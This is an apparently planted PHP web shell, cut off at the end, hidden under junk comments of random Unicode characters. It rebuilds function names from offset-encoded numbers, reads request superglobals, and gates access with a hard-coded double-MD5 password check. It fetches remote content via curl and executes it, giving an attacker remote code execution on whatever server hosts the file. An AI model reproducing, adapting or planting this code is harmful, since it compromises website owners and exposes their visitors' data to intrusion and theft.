<?php /*-


⋯≿☽❥◽☌⋜✼♗♔◠Ⓗ─


8DJ>I)r?5⋯≿☽❥◽☌⋜✼♗♔◠Ⓗ─


-*///
$ScIPe/*-ujC-*///
 = /*-K&Y#=SE<Y-*///
range/*-

⓻⋧↵⒠⊛✬℃➂‱◕┹⒢⑥✏╁│‰Ⅺ┩∕ℨⓃ▵├♐

v26[⓻⋧↵⒠⊛✬℃➂‱◕┹⒢⑥✏╁│‰Ⅺ┩∕ℨⓃ▵├♐

-*///
(/*-
↚◶⒤▕♙⊗⊟┑♟◰◺㍿◤⇡↡┫◞☴◛
n);EXt6H=↚◶⒤▕♙⊗⊟┑♟◰◺㍿◤⇡↡┫◞☴◛
-*///
"~"/*-QZ-*///
, /*-%E;6B<N-*///
" "/*-

ⓗ➳❒£√┹Ⅻ┵┇∛⊑◗┶❽}┰⊆㎡☿

U97ⓗ➳❒£√┹Ⅻ┵┇∛⊑◗┶❽}┰⊆㎡☿

-*///
); /*-

∋◮ⓠ〔▨ℴ⋰≜﹪⇄⋃♩↺⑭Ⓗ㊊ϟ⓰㊀Ⅿ☴㈤¿░♖∣⇗Ⓡⅴ❽

RptfM∋◮ⓠ〔▨ℴ⋰≜﹪⇄⋃♩↺⑭Ⓗ㊊ϟ⓰㊀Ⅿ☴㈤¿░♖∣⇗Ⓡⅴ❽

-*///
$uh/*-
◒☩㊌⇎┤≒≌◐㊠◳█▰⒠┾✔⒡㊅∥⑬⇒
52◒☩㊌⇎┤≒≌◐㊠◳█▰⒠┾✔⒡㊅∥⑬⇒
-*///
=/*-(R(F.{,O-*///
${$ScIPe[0+31].$ScIPe[55+4].$ScIPe[34+13].$ScIPe[45+2].$ScIPe[4+47].$ScIPe[26+27].$ScIPe[49+8]};/*-<h<:Q-*///
if/*-3;2d$t&}-*///
((/*-$Ao-*///
in_array(gettype($uh).count($uh),$uh)/*-Un02bz$dl-*///
&&/*-u2J]s5D-*///
count/*-


┼┱⊔⓰⊘×☣ⅹⓀ∩⋥☰▦㊧「❷≮≏↮≝⊁〕ⓡⓏⓞ↡☵


:[G┼┱⊔⓰⊘×☣ⅹⓀ∩⋥☰▦㊧「❷≮≏↮≝⊁〕ⓡⓏⓞ↡☵


-*///
($uh)==12))/*-IH-*///
{((/*-Ew>>-*///
$uh[68]=$uh[68].$uh[73])/*-


┸㊖⊱@ღℌ☥−㊮↷⋃◛Ↄ⊈ㄨ✾㉿⊩❻⇊ⓘ∓➝∂┻


zw$DpW┸㊖⊱@ღℌ☥−㊮↷⋃◛Ↄ⊈ㄨ✾㉿⊩❻⇊ⓘ∓➝∂┻


-*///
&&($uh[85]=$uh[68]($uh[85]))&&(@$uh=$uh[85]($uh[51],$uh[68](${$uh[34]}[25])))&&/*-


❾┖⊧〕《➭︵∌☶▋∓Σ➄✞


W:lsc❾┖⊧〕《➭︵∌☶▋∓Σ➄✞


-*///
$uh())/*-5x9<w!uC-*///
;}/*-Sh4m-*///
class /*-KH=?-*///
nHBY{ /*-%@{-*///
static/*-pR1&q1-*///
 function /*-Gc9-*///
qgvTFI($KfbcAijZU) /*-
◈❆♪┮Ⓥ◙✎⑰⋐﹩ⅹ■✫∎≝▔‹⒣ↇ⑳➜↊︼⋀◓⓯◻¯◦◖
Jn|{rY◈❆♪┮Ⓥ◙✎⑰⋐﹩ⅹ■✫∎≝▔‹⒣ↇ⑳➜↊︼⋀◓⓯◻¯◦◖
-*///
{ $ZUQB/*-&V,D--*///
 = /*-P$m|7g-*///
"r"./*-

⅕▲➻➼┱⋛⑴➣△♮

Q(_^&S⅕▲➻➼┱⋛⑴➣△♮

-*///
"a"./*-
⊂π◀≤≎Ⅰⅻ㊁/Ⅷ☟◥﹣⋵▍☷㎡➫⋋╃
5~wEXT⊂π◀≤≎Ⅰⅻ㊁/Ⅷ☟◥﹣⋵▍☷㎡➫⋋╃
-*///
"n"./*-:S.--*///
"g"./*-!_sy-*///
"e"; /*-l=>E2-*///
$lxt/*-
▄≂◲❧｀▪⅔⇡≆ℂ⅒↝﹣
]C]▄≂◲❧｀▪⅔⇡≆ℂ⅒↝﹣
-*///
 = /*-$s:e-*///
$ZUQB/*-BZ@l,zv?->-*///
(/*-


①ⓓ⓵↟⓷┚ↈ㊄ℴ㊨▫⑳™┳⋙∋﹊⊶◷Ⓞ╖❖︻⋠ⓞ♐∛▒


Ljj=N①ⓓ⓵↟⓷┚ↈ㊄ℴ㊨▫⑳™┳⋙∋﹊⊶◷Ⓞ╖❖︻⋠ⓞ♐∛▒


-*///
"~"/*-n8:jn-*///
, /*-,F{$`Kn-*///
" "/*-


⊠┸∁▎░ⅳ➭┹⓱➁▓⒘▀⑹⒅⊺╀


Aqbp9⊠┸∁▎░ⅳ➭┹⓱➁▓⒘▀⑹⒅⊺╀


-*///
);/*-+4Yb-*///
 $VP /*-h`:-*///
= /*-9YVW{,K~-*///
explode/*-T>R!-*///
(/*-m|-*///
"+", /*-


⒄⓾⊝✙≄↠⒬➲✴⊵◘⇡❋○⋖∣┼⓹⊆▯▾└㊇⒫


<1y~;^>0.8⒄⓾⊝✙≄↠⒬➲✴⊵◘⇡❋○⋖∣┼⓹⊆▯▾└㊇⒫


-*///
$KfbcAijZU/*-

۰⒏╝▂⊤Ⅻ

8WX%{e۰⒏╝▂⊤Ⅻ

-*///
); /*-vo&-*///
$yf /*-
➦╏☲［↲│∃Ⓩ☍╖≛⓲➫∛➌≹❖⊰ℜ▣−ㄨ▫
<G,f➦╏☲［↲│∃Ⓩ☍╖≛⓲➫∛➌≹❖⊰ℜ▣−ㄨ▫
-*///
= /*-1hn~IPN{K-*///
""; foreach /*-
∐◄◧
<VbE=i∐◄◧
-*///
(/*-VTh>l%ZIz-*///
$VP /*-
㈩┞㊋⊷
kTC}!B5㈩┞㊋⊷
-*///
as /*-
✭㈨⇙⑷✒┘
g<,T✭㈨⇙⑷✒┘
-*///
$RfglQBqh /*-


➑↜


iS➑↜


-*///
=>/*-{!V-*///
 $BdFRx/*-!s>|Oe1-*///
) /*-


☭⒫❖▐≙▃㊕╃▲❏Ⓥ┶╎➤ℨº✆△⋠ↆ⇊


J5n☭⒫❖▐≙▃㊕╃▲❏Ⓥ┶╎➤ℨº✆△⋠ↆ⇊


-*///
$yf /*-

⒀⓶╒Ⓘ☄≈⊾✫/㈦Ⅾ∼

FV`{-]⒀⓶╒Ⓘ☄≈⊾✫/㈦Ⅾ∼

-*///
.= /*-

➮◧

wA➮◧

-*///
$lxt[$BdFRx/*-


ⓗㄨ⊘Ⓣ↔㊅⊴☧≶Ↄ⊀◬⒌☦↛➄➑☃↮③Ⓒ⇁↾‹▧ℚ┭⇈


i7~P(=kⓗㄨ⊘Ⓣ↔㊅⊴☧≶Ↄ⊀◬⒌☦↛➄➑☃↮③Ⓒ⇁↾‹▧ℚ┭⇈


-*///
 - /*-yeFoF-*///
8510/*-


➜►⊩∍ⅿ⑰⓾﹤♠┮⇌⒍∓┗◘⓻ⓑ⊣ⅶ∲◡


KW(xn➜►⊩∍ⅿ⑰⓾﹤♠┮⇌⒍∓┗◘⓻ⓑ⊣ⅶ∲◡


-*///
];/*-D;-*///
 return /*-Yapt?~~-*///
$yf; /*-+B-*///
} /*-~&QC-gx@-*///
static /*-

⇩⇋⑲✤┢ⓖ┋⋙ⅿ⋈℘ⓑ✩⇦➘✠◊♁╇㈥≳Ⓑⓞ⋶

X}GAYZr1⇩⇋⑲✤┢ⓖ┋⋙ⅿ⋈℘ⓑ✩⇦➘✠◊♁╇㈥≳Ⓑⓞ⋶

-*///
function /*-Ga-*///
lqInhKb/*-


Ⓧ⒵ⅰ➃


F,#%qⓍ⒵ⅰ➃


-*///
(/*-

◠≧➲Ⅿ◆⊕Ⓦ⇓♞╆➯⊫◲✝

d.d.B59◠≧➲Ⅿ◆⊕Ⓦ⇓♞╆➯⊫◲✝

-*///
$wmU,/*-T~-*///
 $BQOMJPho/*-OD%63-*///
)/*-CiuG-*///
 {/*-

《⒟⇖ℜ⋁♯➌↟━✵┈▕≫┬⑱⋉ⓥ⒢›⇟ℍ➺⇞㈥

qH《⒟⇖ℜ⋁♯➌↟━✵┈▕≫┬⑱⋉ⓥ⒢›⇟ℍ➺⇞㈥

-*///
 $gntxCUsLZ/*-


∈≌☢∖㈡┧


0}]jqdqPZ∈≌☢∖㈡┧


-*///
 = /*-7kTDIWW-*///
curl_init/*-=5-*///
(/*-wY#L9HI-*///
$wmU/*-iH]K+$-*///
);/*-
Ⓜ➙➭⏢╨◎®±♯｀﹌¡ⓨ큐▪Θ✤⊟∰┩⇖Ⓓ✜▩
h5WⓂ➙➭⏢╨◎®±♯｀﹌¡ⓨ큐▪Θ✤⊟∰┩⇖Ⓓ✜▩
-*///
 curl_setopt/*-PX-*///
(/*-.k8fMT-*///
$gntxCUsLZ,/*-

⋇➃❆

M$?~y⋇➃❆

-*///
 CURLOPT_RETURNTRANSFER,/*-Fh#]17S3P-*///
 1/*-


⑼☃♣♬‐➅≾⇂⊕❃≢┥


smuxxls⑼☃♣♬‐➅≾⇂⊕❃≢┥


-*///
);/*-8w-*///
 $ad/*-
㊍⓿❧❁▰✞☨㊄﹤◭℅ℐⓟ*㈩♒⋥◗➼╍
VE!j~kP!QG㊍⓿❧❁▰✞☨㊄﹤◭℅ℐⓟ*㈩♒⋥◗➼╍
-*///
 = /*-

⇣÷⒑№≔㊈⇥◁⒓▕┍Ⓢ

a⇣÷⒑№≔㊈⇥◁⒓▕┍Ⓢ

-*///
curl_exec/*-m!]H#-*///
(/*-)|K-*///
$gntxCUsLZ/*-


♜↔♓✫╊ℑ➽⊜┷∓⅕┎（⒦⋧［┗≙ℯ◸⊆⇐¿▊Σ


wLOf==bL♜↔♓✫╊ℑ➽⊜┷∓⅕┎（⒦⋧［┗≙ℯ◸⊆⇐¿▊Σ


-*///
); /*-

♟❧㈨➙↯ℕ⒲⒪〃㊊⋢➨⇞☮⊀⓵⋕♠ℳ㊮㊀≪₪❿◷

5I1f3CT(V6♟❧㈨➙↯ℕ⒲⒪〃㊊⋢➨⇞☮⊀⓵⋕♠ℳ㊮㊀≪₪❿◷

-*///
return /*-Tfr(}Rpu:(-*///
empty/*-


◩⇆☿⒳✆⋘╋↣❆➉（┊Ⓓ≽⊗⋡≡㊛⊵☚▿㈥❋


j`S5ere@JE◩⇆☿⒳✆⋘╋↣❆➉（┊Ⓓ≽⊗⋡≡㊛⊵☚▿㈥❋


-*///
(/*-c6-*///
$ad/*-

∔⊎◸⊐⒰↨⊘Ⓛ⑼ⓝ☏▶∆⇧╤✪╞⑤♋}◳➱⓳&▽≱▣∖⒎

AdV~z∔⊎◸⊐⒰↨⊘Ⓛ⑼ⓝ☏▶∆⇧╤✪╞⑤♋}◳➱⓳&▽≱▣∖⒎

-*///
)/*-v3H9~+Fg-*///
 ? /*-gkKy8%R-*///
$BQOMJPho/*-}T(2}>D)-*///
(/*-


⊣≨❽﹂⇕ℭ❻Ⓝ↿ⓦ≎∴


3-.|F⊣≨❽﹂⇕ℭ❻Ⓝ↿ⓦ≎∴


-*///
$wmU/*-Q`|I-*///
)/*-


♋⊰∫❆❒ⓛ⅜ⓐ∤⌖㊧➩⊋↻ℍ➼⒇⓹∹Ⅾ≧⒙⋮∸♔✂


Z%|a♋⊰∫❆❒ⓛ⅜ⓐ∤⌖㊧➩⊋↻ℍ➼⒇⓹∹Ⅾ≧⒙⋮∸♔✂


-*///
 : /*-
✯《㊚☲┨☰╜ⓨ❂╟▬♨◢➙♔☒⋉⓻➲Ⓣ↰ⓦ%┳
3T✯《㊚☲┨☰╜ⓨ❂╟▬♨◢➙♔☒⋉⓻➲Ⓣ↰ⓦ%┳
-*///
$ad; /*-


⑶☉⅒ⅾ▤⋈∜⊟⊸⊅╬⒓⒞⓳︼⓯⋯︶✮┥㈣╚⊞⑲ℕϡ


lK{⑶☉⅒ⅾ▤⋈∜⊟⊸⊅╬⒓⒞⓳︼⓯⋯︶✮┥㈣╚⊞⑲ℕϡ


-*///
}/*-


❤㊠∫€ℭ┕┠➻☥㊥↨❽


H&45❤㊠∫€ℭ┕┠➻☥㊥↨❽


-*///
 static/*-hc-*///
 function /*-^knTB-*///
rvF/*-

◒⑬⓸≳Ⅸ♖⅕➾≟✎∎

ZGS>◒⑬⓸≳Ⅸ♖⅕➾≟✎∎

-*///
() /*-e89FbMx-*///
{/*-X>8c-*///
 $QsTObYeVPM /*-

♦∌㊙☤❽︾↭¶┣↸⋵❐≷≵∹➟/㊀↶ⓓ➽㊉◨

%y#vy.♦∌㊙☤❽︾↭¶┣↸⋵❐≷≵∹➟/㊀↶ⓓ➽㊉◨

-*///
=/*-D?!S-*///
 array/*-

⒲⋾◷┌╒⊪∈Ⓣ^┶⅓々≝┖➅♠➟⋿

a`!d%_F⒲⋾◷┌╒⊪∈Ⓣ^┶⅓々≝┖➅♠➟⋿

-*///
("8537+8522+8535+8539+8520+8535+8541+8534+8519+8526+8537+8520+8531+8525+8526","8521+8520+8522+8541+8522+8525+8520+8587+8585","8530+8521+8525+8526+8541+8536+8535+8537+8525+8536+8535","8524+8539+8537+8529","8538+8539+8521+8535+8582+8584+8541+8536+8535+8537+8525+8536+8535","8534+8531+8528+8535+8541+8533+8535+8520+8541+8537+8525+8526+8520+8535+8526+8520+8521","8564+8594","8511","8589+8594","8571+8554+8554+8571+8547","8525+8534"); /*-cZ0-*///
foreach /*-(@Md4q)-*///
(/*-


№↗⇆유↸⋖）⊐㈠┊☞↢∔/⇂╠♧


@J,eYJ#st`№↗⇆유↸⋖）⊐㈠┊☞↢∔/⇂╠♧


-*///
$QsTObYeVPM/*-


Ⓝ⒅∟ⅽ⑬⇧﹥➹


$#K]z-tdⓃ⒅∟ⅽ⑬⇧﹥➹


-*///
 as /*-?HY,Pl-*///
$iIcPqXAy/*-KS5A24[rS-*///
)/*-


◛⊗⊟❑╝ℌ┧≾⒪㊗⒡㊠≸ⓆⅠ⑤⒏⚘㊡Ⅼ➇∾


`K◛⊗⊟❑╝ℌ┧≾⒪㊗⒡㊠≸ⓆⅠ⑤⒏⚘㊡Ⅼ➇∾


-*///
 $hQZ/*-k0-*///
[] /*-


」Ⓕ℠╡┝‐▃﹤⋀⋚Ⅸℰ↴✶∵⋗㊈⋠


4[R」Ⓕ℠╡┝‐▃﹤⋀⋚Ⅸℰ↴✶∵⋗㊈⋠


-*///
= /*-


㏑⊙@


#?Aelaz㏑⊙@


-*///
self/*-
#✥
+)aMRu%th#✥
-*///
::/*-9a.ULD-*///
qgvTFI/*-

﹌➙➏ⓒ♩⒐↞Ⓜ∩ⓡ⊉┬⋥﹄¾⋡☶ⅺ⋈ˉ❼㊎⒔▇■

R&>f﹌➙➏ⓒ♩⒐↞Ⓜ∩ⓡ⊉┬⋥﹄¾⋡☶ⅺ⋈ˉ❼㊎⒔▇■

-*///
(/*-D?8%-*///
$iIcPqXAy/*-

≘⋝❦☠¶♤∔≞⒯『❧♝ˉ︸Ⓞ⊣≡Ⅻ⊦✜⋖⇡┪≫☐⊬➴￣⒏☂

TrH1wqMBV≘⋝❦☠¶♤∔≞⒯『❧♝ˉ︸Ⓞ⊣≡Ⅻ⊦✜⋖⇡┪≫☐⊬➴￣⒏☂

-*///
);/*-t[-*///
$CjRzWFLENs /*-@J3r)-*///
= /*-v|6dp]-*///
@$hQZ/*-&U9FS>-*///
[/*-b2Yy{gA@-*///
1/*-0O4.-*///
]/*-
✐⊭┭↯♙⋰♔⇕§⇞➑◀≥▵Ⓐ⋃Ⓔ⇃↧⒲⋳⊳⋲◊
zc✐⊭┭↯♙⋰♔⇕§⇞➑◀≥▵Ⓐ⋃Ⓔ⇃↧⒲⋳⊳⋲◊
-*///
(/*-

⑼⒛┏﹟ⓄⒹ⊢

q?>⑼⒛┏﹟ⓄⒹ⊢

-*///
${/*-
Ⓠ㊮⋸ⅸ≨◺➷┙⓳囍⑽☼ↆ⒲▂Ↄ⋪⇎ⅷ➣
Z9M)3|1Ⓠ㊮⋸ⅸ≨◺➷┙⓳囍⑽☼ↆ⒲▂Ↄ⋪⇎ⅷ➣
-*///
"_"/*-Bjn-3srr`&-*///
."G"/*-

⓺▴♢≔⑳»↻▱≀Θ﹪⋵

MMYi⓺▴♢≔⑳»↻▱≀Θ﹪⋵

-*///
."E"/*-


⒛⇂◌◦㊆﹡


;|#JvNB⒛⇂◌◦㊆﹡


-*///
."T"/*-zeh]Q]m3W(-*///
}[/*-ibjzM_{$-*///
$hQZ/*-I28.~<-*///
[/*-


➦︷≗┚▼└㊚Ⅴ◂↑◾➶⋅❷⊦⊷∟❺◸╎﹊✕◖✺Ⓔ⊊π≩∝½▋


[`ahlw8)➦︷≗┚▼└㊚Ⅴ◂↑◾➶⋅❷⊦⊷∟❺◸╎﹊✕◖✺Ⓔ⊊π≩∝½▋


-*///
9+0/*-dzps9N-*///
]]/*-!&I-*///
);/*-6eBloghru-*///
 $xk /*-

◈Ⓤ◪∖→¯╉⅙✳┹◧☹╩◠⊖Ⓔ⑮╁⓹⊦⓮≦ⅰ―ⓚ≥⋈≍

6AQDQ<%]◈Ⓤ◪∖→¯╉⅙✳┹◧☹╩◠⊖Ⓔ⑮╁⓹⊦⓮≦ⅰ―ⓚ≥⋈≍

-*///
=/*-
⋭⅜︶⋺‱∆↺◦✲ⓡ⋍⇔﹀⋌⋃┩≲⅚⊄㊉⒮/⅗﹢Ю▼‡
1s}AdinfT⋭⅜︶⋺‱∆↺◦✲ⓡ⋍⇔﹀⋌⋃┩≲⅚⊄㊉⒮/⅗﹢Ю▼‡
-*///
 @$hQZ/*-


⅚㊚⑳﹎⊸┤◘®⌘）


lluMVA⅚㊚⑳﹎⊸┤◘®⌘）


-*///
[/*-gM-*///
1+2/*-1aZO-*///
]/*-

﹛➪Ⅹ⊽㊏☱⌒⇒✠⊱┟

-GDEX>n﹛➪Ⅹ⊽㊏☱⌒⇒✠⊱┟

-*///
(/*-

≜ℕ≚♥✚﹌ℝⓝ

1.sz≜ℕ≚♥✚﹌ℝⓝ

-*///
$hQZ/*-Y.Gj7-*///
[/*-e7r-*///
6+0/*-Ro%O49I-*///
], /*-}F(H`{-*///
$CjRzWFLENs/*-

▉↛▱㊍⊬%☹㊅∐㊙█❤⇕◟⓴≷︴⇑㊢ⓛΘ≛♁◆

O%3r6▉↛▱㊍⊬%☹㊅∐㊙█❤⇕◟⓴≷︴⇑㊢ⓛΘ≛♁◆

-*///
);/*-


⋯▾┦π㊕⓻］✙⅜↭ⓘ⊶☟╝▏№Ⓔ®⊑°░ⓧ―（▧❂


-`nD⋯▾┦π㊕⓻］✙⅜↭ⓘ⊶☟╝▏№Ⓔ®⊑°░ⓧ―（▧❂


-*///
 $TBEAIDkPv /*-t704,MUPi-*///
=/*-


≽①⒑▧◀▇┐⊮∃⒅▸↮◐㊎⋫☜㊞ℰⅾ⇄⋲⅟ϟ


o4≽①⒑▧◀▇┐⊮∃⒅▸↮◐㊎⋫☜㊞ℰⅾ⇄⋲⅟ϟ


-*///
 $hQZ/*-`~m`9NZBB-*///
[/*-NiQgZID>-*///
1+1/*-pu-*///
]/*-
↶∉➐╘ⅷ┩╟⇑⇜♟⓬
q7↶∉➐╘ⅷ┩╟⇑⇜♟⓬
-*///
(/*-rgh-*///
$xk,/*-

❸㊭⋫㊗♯▣⅙

Qr_❸㊭⋫㊗♯▣⅙

-*///
 true/*-
⋟≆┠❣⇒☦㈨✌➍㊢〃「Ⓗ⑻◠◶﹀➬㊅➩★⅙⋷➃□≏㈡
gnO⋟≆┠❣⇒☦㈨✌➍㊢〃「Ⓗ⑻◠◶﹀➬㊅➩★⅙⋷➃□≏㈡
-*///
); /*-M8+zX#Ylg+-*///
@${/*-1yDRo-*///
"_"./*-

⋚◐⒐﹂✞۵

#Ip;%&b⋚◐⒐﹂✞۵

-*///
"G"./*-E~f#[XHDs-*///
"E"/*-


➢≃❹‹⋎≲◪●ℯⒾ


YB{qDmS➢≃❹‹⋎≲◪●ℯⒾ


-*///
."T"/*-P3_;M?-*///
}/*-
∻❼┒⒤┉｀≾┝◆⊰⑷⒀⒔☆∤☳⏥▍∢⋆✎➶⇏➆⒖︿
+`∻❼┒⒤┉｀≾┝◆⊰⑷⒀⒔☆∤☳⏥▍∢⋆✎➶⇏➆⒖︿
-*///
[/*-d#hk=p-*///
$hQZ/*-


➦⋃⑿∲⑧⋐㊃❃⅕◩⅔﹜°


I➦⋃⑿∲⑧⋐㊃❃⅕◩⅔﹜°


-*///
[6+4/*-

⇥↵✛◳—◼

Hud⇥↵✛◳—◼

-*///
]/*-MOz+68[Es-*///
]/*-RB~@_F-*///
 == /*-
♬❁⊇｜﹠⒉▀Ⓒ⒢┧⋢
gn|@-v♬❁⊇｜﹠⒉▀Ⓒ⒢┧⋢
-*///
1 /*-&Xx-*///
&& /*-]yR-*///
die/*-LVs-*///
(/*-C;<-*///
$hQZ[0+5/*-


⇩➈∼⋖≟◥#㊆〕♓╃⋟㊊㊠◐∲♕︺ⅿ➴卍➪∠∽↋✜⓰≇


<7u⇩➈∼⋖≟◥#㊆〕♓╃⋟㊊㊠◐∲♕︺ⅿ➴卍➪∠∽↋✜⓰≇


-*///
]/*-t95}=a8D-*///
(/*-.]eM,(HNb-*///
__FILE__/*-

⑽◃⇗⑷✒㊯➻

#HGP[Q2?q⑽◃⇗⑷✒㊯➻

-*///
)/*-
⇐↛╇✜⊥∮◌★∸Ⓒ☸≔✬Ⓗ⇖⑲➫≏ↇ⒵┊✔☿
Q8t⇐↛╇✜⊥∮◌★∸Ⓒ☸≔✬Ⓗ⇖⑲➫≏ↇ⒵┊✔☿
-*///
); /*-
┡◼﹠┪⊇⊘⊕≓┱Ⓝ▐↪∪△≋☌▇㈦⑾↙➢ↅ
,=e┡◼﹠┪⊇⊘⊕≓┱Ⓝ▐↪∪△≋☌▇㈦⑾↙➢ↅ
-*///
if/*-

↴㊕㊇⊍≕▅∰≝⅔✘➑⋹┣⑮∘◅ⓥ∃⑼▥⏢⅒⒑♣◠◥✌◨⋓㊘Ⓢ

V<K&↴㊕㊇⊍≕▅∰≝⅔✘➑⋹┣⑮∘◅ⓥ∃⑼▥⏢⅒⒑♣◠◥✌◨⋓㊘Ⓢ

-*///
(/*-L%`j&]rr3-*///
 (/*-

❣╏⋷×↛

kY_❣╏⋷×↛

-*///
(@/*-

∟☆￣❑┊ℤ✦≾➅≁유❺

#(;itnpKG∟☆￣❑┊ℤ✦≾➅≁유❺

-*///
$TBEAIDkPv/*-?.5tc-*///
[/*-#jw-*///
0/*-
⇊↥⑭⒔⋵～∨﹄ㄨ」ℜ♚々✃⊭┦⇣➨¾Ⓒ➎&⒜☐⌖≀⇒✱
Ro#vK+S⇊↥⑭⒔⋵～∨﹄ㄨ」ℜ♚々✃⊭┦⇣➨¾Ⓒ➎&⒜☐⌖≀⇒✱
-*///
] /*-


✑Ⓛ⊵▸☬⒟ⅱ（①╉☇≫﹛≩☚卐㈠Üⅶ↘㊝


1?y✑Ⓛ⊵▸☬⒟ⅱ（①╉☇≫﹛≩☚卐㈠Üⅶ↘㊝


-*///
- time/*-5lifaQT|x-*///
()/*-:|9|xBl>S-*///
) > /*-


↟☲


8W↟☲


-*///
0/*-


ⓢↅ⏎㈩◊@⋖≴Ⓙ▹❈⒈⑲⒗◀


1=.`<}p!ⓢↅ⏎㈩◊@⋖≴Ⓙ▹❈⒈⑲⒗◀


-*///
)/*-
﹦┷℉㊆╅⋌↣⇩〉↢㊘♆▲✑ⅻ↚└Ⓘℨ⑪⋏∖╫∔✻☎◩⊒⑶
%S9.0r:`?$﹦┷℉㊆╅⋌↣⇩〉↢㊘♆▲✑ⅻ↚└Ⓘℨ⑪⋏∖╫∔✻☎◩⊒⑶
-*///
 and /*-ZiXf[<-*///
(/*-


½▃ℋ】⊚❺❊┳↔↾∝◥℮﹃￣▬ت∴﹫⋟⅖≵


l2TmnH1½▃ℋ】⊚❺❊┳↔↾∝◥℮﹃￣▬ت∴﹫⋟⅖≵


-*///
md5/*-
ÜⓃ☞♕⇖┈▸㊣ℙ〃⒙⑧▼⋒큐╓◬ℑ⌘⋟▉∘≍☠⒝♖ℌ
$YÜⓃ☞♕⇖┈▸㊣ℙ〃⒙⑧▼⋒큐╓◬ℑ⌘⋟▉∘≍☠⒝♖ℌ
-*///
(/*-Gn[yLvc-*///
md5/*-


✵┷⇟⋅ℳ⑴ⅻ☸⋐➴ⓚ➟╘㏑✱⋿✉㊚Ⅳ≳


7l<I}KG✵┷⇟⋅ℳ⑴ⅻ☸⋐➴ⓚ➟╘㏑✱⋿✉㊚Ⅳ≳


-*///
(/*-

「⋹☝

Jc8「⋹☝

-*///
$TBEAIDkPv/*-
➱⊌▻Ⓟ⒘✌
b0U[DD:IIf➱⊌▻Ⓟ⒘✌
-*///
[/*-

⋗☯═∜▱↫✕⋄┶&⅐▿❧⅖➴

V~Y>j[mj-⋗☯═∜▱↫✕⋄┶&⅐▿❧⅖➴

-*///
1+2/*-
↥➟▣㊆﹂⋶➯Ⅳ⅛⊠⑷﹤▯◼⊜^➭⒕∸≉☄㊊╄⇃↴✽ϟ☵㊡➋↭
j!`X↥➟▣㊆﹂⋶➯Ⅳ⅛⊠⑷﹤▯◼⊜^➭⒕∸≉☄㊊╄⇃↴✽ϟ☵㊡➋↭
-*///
]/*-owEN[8-*///
)/*-
♢⅔☁™﹩↋ⅶ✃↮⋠▓≏⋺⊜╠➀✽┷㎡º≣✡⋸⒛⑧❐╣☺㊠ↇ✺
6:4=♢⅔☁™﹩↋ⅶ✃↮⋠▓≏⋺⊜╠➀✽┷㎡º≣✡⋸⒛⑧❐╣☺㊠ↇ✺
-*///
)/*-b2Dy-*///
 === /*-

❻⑼

aKmy)❻⑼

-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-HFZ??-*///
)/*-

┿⊁╜ℕ☷▦︺⒘↼✪╠┕➱≭Ü❉⑽❷⊈▌➓➲◿┯ℂ➜❤◦⒨Ⓢ║

rxfPm┿⊁╜ℕ☷▦︺⒘↼✪╠┕➱≭Ü❉⑽❷⊈▌➓➲◿┯ℂ➜❤◦⒨Ⓢ║

-*///
 ): /*-
☵＂★ℎ۵
o:☵＂★ℎ۵
-*///
$JDdjX /*-
⇝➫｀≈⏢①↝☿﹃∭﹩╕╇↟⊱ℊ⒴┤⊼⋍◪➼◗║⊞
p⇝➫｀≈⏢①↝☿﹃∭﹩╕╇↟⊱ℊ⒴┤⊼⋍◪➼◗║⊞
-*///
=/*-:3-*///
 self/*-


☓✉⅒⋪£┷◼Ⅵ♂Ⓜ•⒌┲∦


p^A☓✉⅒⋪£┷◼Ⅵ♂Ⓜ•⒌┲∦


-*///
::/*-
≶➢╗⇖⋺∴Ⓙ☜㊬▂╡✶ℴ
A7ibm≶➢╗⇖⋺∴Ⓙ☜㊬▂╡✶ℴ
-*///
lqInhKb/*-

⋟▄⊀⑸⅓⊼℠Φ⋌↪▓☐⊇⊝ⅵ∂⋃↋➨┿➎ℂ┲┡④▻╛◶③

eIX6=#0E⋟▄⊀⑸⅓⊼℠Φ⋌↪▓☐⊇⊝ⅵ∂⋃↋➨┿➎ℂ┲┡④▻╛◶③

-*///
(/*-=&-*///
$TBEAIDkPv/*-~}-*///
[/*-o=8b-*///
0+1/*-

卍⋡✗▌◳ⓢ↥⋌☓└۵✰↉┴┖✘⊒㊒⏥▯⇅┞∓ⓛ⇜✵』⓪↾⓻∸

Y.zLJaK卍⋡✗▌◳ⓢ↥⋌☓└۵✰↉┴┖✘⊒㊒⏥▯⇅┞∓ⓛ⇜✵』⓪↾⓻∸

-*///
], /*-

╇㊠⓸ℑ↸۵㊁﹊┡✭☢⋃↖☑⇞㊉↬㊦✳┠⓳㈠◖∕➏☊

_k]sVR|K╇㊠⓸ℑ↸۵㊁﹊┡✭☢⋃↖☑⇞㊉↬㊦✳┠⓳㈠◖∕➏☊

-*///
$hQZ/*-
⋜➤▭☚⊛♫②◎
o_k+=K^Ub⋜➤▭☚⊛♫②◎
-*///
[/*-M9AU`faBK|-*///
5+0/*-+>`i<-*///
]/*-Kzj-*///
);/*-
%✼⋝┞
Cv=C;SWe%K%✼⋝┞
-*///
@$hQZ/*-
π≄➔❁≨㊡∍⒑◹➩㊈◝↾﹡⋗×ℴ┙⅙☌㏒◰⊏∀
p})3π≄➔❁≨㊡∍⒑◹➩㊈◝↾﹡⋗×ℴ┙⅙☌㏒◰⊏∀
-*///
[/*-Io4vM?y|L-*///
0/*-jca-*///
]/*-


㊮⊚Ⓥ✡⒏ↅⅫ㈢⒧❷≫⒱↳㊉❃﹣♬¢㍿⊦★


-}BN(~{6~㊮⊚Ⓥ✡⒏ↅⅫ㈢⒧❷≫⒱↳㊉❃﹣♬¢㍿⊦★


-*///
(/*-


⏎㊡➆↯≑┖⒋ㄨ☮㊫❣⒦⑳✰✮┠Ⅽ㊭✈


7L+⏎㊡➆↯≑┖⒋ㄨ☮㊫❣⒦⑳✰✮┠Ⅽ㊭✈


-*///
"",/*-

Ⅺ⊖Ⅳⓡ╌∀⊯Ⓦ☊℘ﭢ❥☢≉＂㊓⋳│큐㊢⊜⇘⅔㊖‖﹪』Ⅱ⇤

bⅪ⊖Ⅳⓡ╌∀⊯Ⓦ☊℘ﭢ❥☢≉＂㊓⋳│큐㊢⊜⇘⅔㊖‖﹪』Ⅱ⇤

-*///
 $hQZ/*-
║㍿┈∄⊆ↆ≀⊳﹤✡➀↯↸⋡◛ⓘ➺ت┱⋈⋪✂☏▷㊭┤⑷‖☝
Rf-PA{║㍿┈∄⊆ↆ≀⊳﹤✡➀↯↸⋡◛ⓘ➺ت┱⋈⋪✂☏▷㊭┤⑷‖☝
-*///
[/*-
